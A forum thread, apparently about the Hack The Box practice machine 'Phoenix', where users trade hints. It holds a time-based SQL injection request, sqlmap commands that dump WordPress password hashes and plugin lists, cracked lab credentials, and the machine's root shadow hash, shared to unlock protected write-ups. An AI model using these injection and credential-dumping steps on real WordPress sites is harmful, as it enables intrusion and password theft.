Hi Dears,

let's open discussion about phoenix machine 10.10.11.149

---

i found registration page in this url , seem it use wordpress
https://phoenix.htb/wp-admin/

anyone has any useful information

this one is painfully slow. heres some tips.

GET /forum/topic/lets-build-a-secure-world/?subscribe_topic=1%20union%20select%201%20and%20sleep(10) HTTP/2

save that as a raw request file in burp/ZAP

## Get Creds to crack
sqlmap -r starred --dbms=MYSQL --random-agent -D wordpress -T wp_users -C user_pass --dump


## find plugins with exploits that cant be seen externally
sqlmap -r raw_request --dbms=MYSQL --random-agent -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump (skip further tests when it asks)


exploit plugin... get rce

give Rep if it helps.

(March 19, 2022, 06:41 AM)skyweasel Wrote: this one is painfully slow. heres some tips.

GET /forum/topic/lets-build-a-secure-world/?subscribe_topic=1%20union%20select%201%20and%20sleep(10) HTTP/2

save that as a raw request file in burp/ZAP

## Get Creds to crack
sqlmap -r starred --dbms=MYSQL --random-agent -D wordpress -T wp_users -C user_pass --dump


## find plugins with exploits that cant be seen externally
sqlmap -r raw_request --dbms=MYSQL --random-agent -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump (skip further tests when it asks)


exploit plugin... get rce

give Rep if it helps.

thanks my friend .. rep ++

(March 19, 2022, 06:41 AM)skyweasel Wrote: this one is painfully slow. heres some tips.

GET /forum/topic/lets-build-a-secure-world/?subscribe_topic=1%20union%20select%201%20and%20sleep(10) HTTP/2

save that as a raw request file in burp/ZAP

## Get Creds to crack
sqlmap -r starred --dbms=MYSQL --random-agent -D wordpress -T wp_users -C user_pass --dump


## find plugins with exploits that cant be seen externally
sqlmap -r raw_request --dbms=MYSQL --random-agent -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump (skip further tests when it asks)


exploit plugin... get rce

give Rep if it helps.

i able to dump hashes and crack them , try to login with some users but found some kind of 2FA 
any hint

i found these credentials but totally stuck after this  

john:password@1234
jsmith:superphoenix

does anyone find anything else

(March 21, 2022, 10:38 AM)john2 Wrote: i found these credentials but totally stuck after this  

john:password@1234
jsmith:superphoenix

does anyone find anything else

Did you run the sqlmap to find the plugins (as above) - takes AGES but theres a plugin there that has an exploit in exploitdb for initial RCE shell. Once there, check your users and try ssh with passwords you already have.

Hi everybody. If anybody will share full root's hash

 root: ....... ::: 

i'll share writeup (web page copy)

(March 22, 2022, 11:01 PM)orangutang Wrote: Hi everybody. If anybody will share full root's hash

 root: ....... ::: 

i'll share writeup (web page copy)

root:$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0:18944:0:99999:7:::

(March 23, 2022, 06:45 AM)skyweasel Wrote:

(March 22, 2022, 11:01 PM)orangutang Wrote: Hi everybody. If anybody will share full root's hash

 root: ....... ::: 

i'll share writeup (web page copy)

root:$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0:18944:0:99999:7:::

thanks for sharing friend

---

(March 22, 2022, 11:01 PM)orangutang Wrote: Hi everybody. If anybody will share full root's hash

 root: ....... ::: 

i'll share writeup (web page copy)

waiting the write up my brother

This is link

 https://synisl33t.com/2022/03/08/htb-phoenix/ 

I think there is some mistake in root's hash. Protected writeups open with full hash

 root:.......:::